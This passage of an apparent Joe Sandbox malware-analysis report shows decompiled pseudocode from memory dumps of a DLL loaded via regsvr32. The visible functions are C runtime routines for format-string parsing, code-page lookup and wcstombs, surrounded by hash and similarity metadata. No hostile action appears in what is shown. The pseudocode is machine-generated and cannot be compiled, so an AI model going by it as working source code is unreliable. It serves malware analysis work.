                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-734865713
                                                      • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                      • Instruction ID: 14f8518244b6aa56c92c2133ed4feb23c5223715f37474fc6187c6031a63ef29
                                                      • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                      • Instruction Fuzzy Hash: 94414DB2A0C6C28AE7F09B64E8407BEB2E4F384746F600125D6C9875E8DB3DD444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_oneof_swprintf_p
                                                      • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2731067127-3604075083
                                                      • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                      • Instruction ID: d4871e39cfd66166000c08c845a9e51e3e7b3f71581565f00727d2aef18c331a
                                                      • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                      • Instruction Fuzzy Hash: C8415972A0D7C186E7A49B55E8903AEBBA0F784740FA14126E6CD47BA9DB3ED404CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 41%
                                                      			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                      				void* _v16;
                                                      				long long _v24;
                                                      				long long _v32;
                                                      				long long _v40;
                                                      				long long _v48;
                                                      				void* _v56;
                                                      				signed int _v72;
                                                      				long long _v80;
                                                      				signed int _v88;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				void* _t92;
                                                      				void* _t93;
                                                      				void* _t101;
                                                      				long long _t113;
                                                      				intOrPtr _t116;
                                                      				void* _t117;
                                                      				long long _t118;
                                                      				long long _t121;
                                                      				long long _t122;
                                                      				long long _t125;
                                                      				void* _t164;
                                                      
                                                      				_t113 = __rax;
                                                      				_a32 = r9d;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                                      				E000007FE7FEF9D2E680(_t79, _t113);
                                                      				_v80 = _t113;
                                                      				0xf9d24000();
                                                      				_v56 = _t113 + 0x100;
                                                      				 *_v56 =  *_v56 + 1;
                                                      				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                                      				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                                      				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                                      				_t116 = _a24;
                                                      				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                                      				goto 0xf9d34fbe;
                                                      				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                                      				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                      				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                      				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                      				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                      				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                                      				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                                      				_v48 = _t118;
                                                      				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                                      				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                      				_v40 = _t121;
                                                      				goto 0xf9d35041;
                                                      				_v40 = 0;
                                                      				if (_v40 == 0) goto 0xf9d350f4;
                                                      				r9d = _v72;
                                                      				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                                      				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                      				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                                      				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                                      				_v32 = _t122;
                                                      				E000007FE7FEF9D2E680(_t93, _t122);
                                                      				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                      				_v24 = _t125;
                                                      				goto 0xf9d350d2;
                                                      				_v24 = 0;
                                                      				r8d = 0x103;
                                                      				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                                      				goto 0xf9d350f6;
                                                      				_v88 = _v72;
                                                      				goto 0xf9d34f83;
                                                      				0xf9d24000();
                                                      				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                                      				0xf9d24000();
                                                      				_v16 = _t125 + 0x100;
                                                      				 *_v16 =  *_v16 - 1;
                                                      				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                                      				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                                      				_t101 = E000007FE7FEF9D2CF80(_v16);
                                                      				r9d = _v88;
                                                      				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                                      			}



























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                      • String ID:
                                                      • API String ID: 2452617236-0
                                                      • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                      • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                                      • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                      • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                      				long long _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				int _v28;
                                                      				int _v32;
                                                      				char _v64;
                                                      				long long _v72;
                                                      				intOrPtr _t29;
                                                      				intOrPtr* _t41;
                                                      
                                                      				_t41 = __rax;
                                                      				_a8 = __ecx;
                                                      				_v16 = 0xfffffffe;
                                                      				_v72 = 0;
                                                      				0xf9d266b0();
                                                      				 *0xf9d4cd68 = 0;
                                                      				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                                      				 *0xf9d4cd68 = 1;
                                                      				_v32 = GetOEMCP();
                                                      				E000007FE7FEF9D26800( &_v64);
                                                      				goto 0xf9d29fe3;
                                                      				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                                      				 *0xf9d4cd68 = 1;
                                                      				_v28 = GetACP();
                                                      				E000007FE7FEF9D26800( &_v64);
                                                      				_t29 = _v28;
                                                      				goto 0xf9d29fe3;
                                                      				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                                      				 *0xf9d4cd68 = 1;
                                                      				E000007FE7FEF9D26840(_t29,  &_v64);
                                                      				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                      				E000007FE7FEF9D26800( &_v64);
                                                      				goto 0xf9d29ff9;
                                                      				_v20 = _a8;
                                                      				E000007FE7FEF9D26800( &_v64);
                                                      				return _v20;
                                                      			}













                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_
                                                      • String ID:
                                                      • API String ID: 1901436342-0
                                                      • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                      • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                                      • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                      • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                      • API String ID: 2123368286-552404435
                                                      • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                      • Instruction ID: a80555c9662aee50eaf55af6b2d7c09464ca7ea00ccabcf41043a4b878837ec0
                                                      • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                      • Instruction Fuzzy Hash: 4B511726A0DBC586E6B48B19E84476EB3E0F386361F204625D6ED43BE8DF7ED4458B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                      				void* _t184;
                                                      				char* _t204;
                                                      				char* _t205;
                                                      
                                                      				_a112 = 0;
                                                      				_a108 = _a112;
                                                      				_a88 = _a108;
                                                      				_a92 = _a88;
                                                      				_a80 = 0;
                                                      				_a116 = 0xffffffff;
                                                      				_a76 = 0;
                                                      				_a968 = _a696 & 0x000000ff;
                                                      				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                      				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                      				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                      				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                      				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000001;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000002;
                                                      				goto 0xf9d3bd7d;
                                                      				asm("bts eax, 0x7");
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000008;
                                                      				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                      				_t204 =  &_a1112;
                                                      				_a88 = E000007FE7FEF9D31E40(_t204);
                                                      				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3bdd5;
                                                      				_a88 = _t184 + _t204 - 0x30;
                                                      				_a116 = 0;
                                                      				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                      				_t205 =  &_a1112;
                                                      				_a116 = E000007FE7FEF9D31E40(_t205);
                                                      				if (_a116 >= 0) goto 0xf9d3be14;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3be2d;
                                                      				_a116 = _t184 + _t205 - 0x30;
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}







                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-192189897
                                                      • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                      • Instruction ID: 366f55b25be61a8d80973343189ccb34eb8cf05d0f6555861afeb0151a731927
                                                      • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                      • Instruction Fuzzy Hash: 1A414C72A0D6C28AE3B0DB24E8547BEB7E4F384345F600126E6D887AA9DB7DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                      				void* _t184;
                                                      				char* _t204;
                                                      				char* _t205;
                                                      
                                                      				_a112 = 0;
                                                      				_a108 = _a112;
                                                      				_a88 = _a108;
                                                      				_a92 = _a88;
                                                      				_a80 = 0;
                                                      				_a116 = 0xffffffff;
                                                      				_a76 = 0;
                                                      				_a1404 = _a1208 & 0x0000ffff;
                                                      				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                      				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                      				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                      				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                      				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000001;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000002;
                                                      				goto 0xf9d3dd2b;
                                                      				asm("bts eax, 0x7");
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000008;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                      				_t204 =  &_a1560;
                                                      				_a88 = E000007FE7FEF9D31E40(_t204);
                                                      				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3dd83;
                                                      				_a88 = _t184 + _t204 - 0x30;
                                                      				_a116 = 0;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t205 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t205);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t184 + _t205 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-734865713
                                                      • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                      • Instruction ID: 2534415b6cec3e8c7a7064d8bee2958269565171124d4a2b4bf05b50673a9d36
                                                      • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                      • Instruction Fuzzy Hash: 4C411CB2A0C6C18AE3B0CB64E8447BEB7E0F384345F600125E6D987AA8DB7DD444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                                      				void* _t190;
                                                      				char* _t210;
                                                      				char* _t211;
                                                      
                                                      				_a76 = 1;
                                                      				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                                      				_a112 = 0;
                                                      				_a108 = _a112;
                                                      				_a88 = _a108;
                                                      				_a92 = _a88;
                                                      				_a80 = 0;
                                                      				_a116 = 0xffffffff;
                                                      				_a76 = 0;
                                                      				_a1404 = _a1208 & 0x0000ffff;
                                                      				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                      				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                      				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                      				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                      				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000001;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000002;
                                                      				goto 0xf9d3dd2b;
                                                      				asm("bts eax, 0x7");
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000008;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                      				_t210 =  &_a1560;
                                                      				_a88 = E000007FE7FEF9D31E40(_t210);
                                                      				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3dd83;
                                                      				_a88 = _t190 + _t210 - 0x30;
                                                      				_a116 = 0;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t211 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t211);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t190 + _t211 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
